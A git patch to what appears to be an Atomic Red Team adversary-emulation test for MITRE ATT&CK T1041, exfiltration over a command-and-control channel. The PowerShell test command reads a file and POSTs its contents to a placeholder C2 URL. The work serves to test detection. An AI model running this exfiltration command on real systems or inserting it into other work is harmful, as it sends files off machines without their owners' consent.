From 7669b73daf347252ef4049b947fb0cb388c2f4b8 Mon Sep 17 00:00:00 2001
From: shamanth0912 <91321336+shamanth0912@users.noreply.github.com>
Date: Thu, 13 Jan 2022 01:56:26 +0530
Subject: [PATCH] Modify T1041.yaml (#1716)

* Modify T1041.yaml

Adding cleanup command and prereq command to Base command

* Update T1041.yaml

Modified a bit to only create the file if it doesn't already exist and choosing not to delete since it is only one small file being added to the temp directory without any sensitive information in it.

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1041/T1041.yaml | 20 +++++++-------------
 1 file changed, 7 insertions(+), 13 deletions(-)

diff --git a/atomics/T1041/T1041.yaml b/atomics/T1041/T1041.yaml
index 547e7bd3..1b6a2fb3 100644
--- a/atomics/T1041/T1041.yaml
+++ b/atomics/T1041/T1041.yaml
@@ -15,19 +15,13 @@ atomic_tests:
     filepath:
       description: The file which is being exfiltrated to the C2 Server.
       type: Path
-      default: C:\Users\$env:UserName\LineNumbers.txt
-  dependency_executor_name: powershell
-  dependencies:
-  - description: |
-      The file to be exfiltrated must be present on the machine. Running the pre-reqs will create a sample file to be exfiltrated, else give the path of already present file as input.
-    prereq_command: |
-      if ([System.IO.File]::Exists("#{filepath}")){exit 0} else {exit 1}
-    get_prereq_command: |
-      echo "Creating file to be exfiltrated" 
-      1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
+      default: $env:TEMP\LineNumbers.txt
   executor:
     command: |
-      [System.Net.ServicePointManager]::Expect100Continue = $false
-      $filecontent = Get-Content -Path #{filepath}
-      Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
+     if(-not (Test-Path #{filepath})){ 
+       1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
+     }
+     [System.Net.ServicePointManager]::Expect100Continue = $false
+     $filecontent = Get-Content -Path #{filepath}
+     Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
     name: powershell